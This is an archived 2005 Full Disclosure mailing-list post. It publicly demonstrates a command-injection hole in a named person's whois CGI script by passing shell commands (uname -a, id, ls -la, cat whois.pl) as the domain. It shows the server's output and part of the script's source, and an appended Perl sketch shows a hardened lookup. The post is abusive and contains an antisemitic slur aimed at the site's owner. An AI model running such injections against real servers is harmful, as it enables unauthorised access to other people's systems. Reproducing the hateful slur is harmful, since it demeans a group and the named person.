Full Disclosure mailing list archives

Fernando Gont remote command execution and big mouth vulnerability


From: Joxean Koret <joxeankoret () gmail com>
Date: Wed, 3 Aug 2005 14:22:36 +0200

SHUT THE FUCK UP!!! AND FIX YOUR F%$CK1NG WEBSITE!!!  WE ARE ALL SICK
OF YOUR BORING E-MAILS!!!! MO/A%SDRF!CKER!


http://thor.prohosting.com/fgont/cgi-bin/whois.pl

whois for domain: uname -a

FreeBSD thor.prohosting.com 4.10-RELEASE-p3 FreeBSD 4.10-RELEASE-p3
#0: Fri Nov  5 10:49:09 MST 2004
jblack () thor prohosting com:/usr/obj/usr/src/sys/LOCAL  i386


and whois for domain: id


uid=59286(u0638237) gid=1000(user) groups=1000(user)


and for ls -la

  whois ls -la
total 124
dr-xr-xr-x  2 u0638237  2000    512 Dec 28  2003 .
drwxr-xr-x  6 u0638237  2000    512 Jul 21 04:35 ..
-rwxr-xr-x  1 u0638237  2000  15091 Jul 30  2003 cgi-lib.pl
-rwxr-xr-x  1 u0638237  2000    621 Jun 24  2003 cli.pl
-rwxr-xr-x  1 u0638237  2000    993 Jul 30  2003 dig.pl
-rwxr-xr-x  1 u0638237  2000   4388 Dec 28  2003 fuente.cgi
-r--r--r--  1 u0638237  2000    552 Jun 25  2003 p1.txt
-r--r--r--  1 u0638237  2000    549 Jul  7  2003 p1dig.txt
-r--r--r--  1 u0638237  2000    556 Jul  7  2003 p1host.txt
-r--r--r--  1 u0638237  2000    577 Jul  7  2003 p1ns.txt
-r-xr-xr-x  1 u0638237  2000    562 Dec 28  2003 p1whois.txt
-r--r--r--  1 u0638237  2000    192 Jun 25  2003 p2.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2dig.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2host.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2ns.txt
-rwxrwxrwx  1 u0638237  2000    192 Dec 27  2003 p2whois.txt
-rwxr-xr-x  1 u0638237  2000  10171 Dec 28  2003 whois.cgi
-rwxr-xr-x  1 u0638237  2000    842 Dec 28  2003 whois.pl


BREAKING NEWS... for registrants of domain cat whois.pl

  whois cat whois.pl
#!/usr/local/bin/perl

       require('cgi-lib.pl');
       &ReadParse;

       $p1="p1whois.txt";
       $p2="p2whois.txt";

       print "Content-type: text/html\r\n\r\n";
       $string = $in{'direccion'};

       $_ = $string;
       $string=~ s/\>//g;
.....

$cmd ----->> YOU FUCKING JEW!!!!!!!!!!!

  "; open(p2); while($linea=<p2>){ print "$linea"; } close(p2);


Turkey hunters, inc

 "knock, knock, Neo follow the white turkey!!"

"Fernando Gont" <fernando () frh utn edu ar>
Folks,

My posts to this list have tried to show how easy it is to perform ICMP
attacks against TCP.

The attacks are blind, so the attacker does not need to be a "man in the
middle" to perform them. The typical number of packets required to perform
any of these attacks is about 16000 (in many cases, the attacker requires
fewer packets). This means that even with a 128kbps link, it will take the
attacker much less than a minute to perform them.
.....

Fernando Gont
e-mail: fernando () gont com ar || fgont () acm org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
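
The post above shows whois.pl taking the `direccion` parameter, stripping only `>`, and returning command output. A hardened lookup for that parameter is sketched below as an added example; it is not part of the original post or the site's code. The whois path and the helper names (valid_domain, whois_lookup, html_escape, handle_request) are assumptions.

```perl
#!/usr/bin/perl
# Added example, not the site's whois.pl. Path and limits are assumptions.
use strict;
use warnings;

my $WHOIS = '/usr/bin/whois';    # assumed location of the whois client

# Allow-list check: return the name if it is a dotted hostname, else undef.
# The posted script only stripped '>', leaving spaces, ';', '|', '`' and '$'.
# Returning the capture ($1) also untaints the value under perl -T.
sub valid_domain {
    my ($name) = @_;
    return undef unless defined $name && length($name) <= 253;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;
    return $name =~ /\A($label(?:\.$label)+)\z/ ? $1 : undef;
}

# List-form open() execs whois directly; no shell parses the argument.
sub whois_lookup {
    my ($domain) = @_;
    open(my $fh, '-|', $WHOIS, $domain) or return "lookup failed\n";
    local $/;                    # slurp the whole reply
    my $out = <$fh>;
    close($fh);
    return defined $out ? $out : '';
}

# Escape the reply before it is printed into the HTML page.
sub html_escape {
    my ($s) = @_;
    my %ent = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;', '"' => '&quot;');
    $s =~ s/([&<>"])/$ent{$1}/g;
    return $s;
}

# What the CGI would call with $in{'direccion'}.
sub handle_request {
    my ($raw) = @_;
    my $domain = valid_domain($raw);
    return "invalid domain name\n" unless defined $domain;
    return html_escape(whois_lookup($domain));
}

# Constructed inputs: one hostname plus the strings shown in the post.
for my $in ('example.com', 'uname -a', 'id', 'ls -la', 'cat whois.pl') {
    printf "%-14s %s\n", $in, defined(valid_domain($in)) ? 'accepted' : 'rejected';
}
```

Run as written, the loop only exercises the validator, so no whois client or network access is needed.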

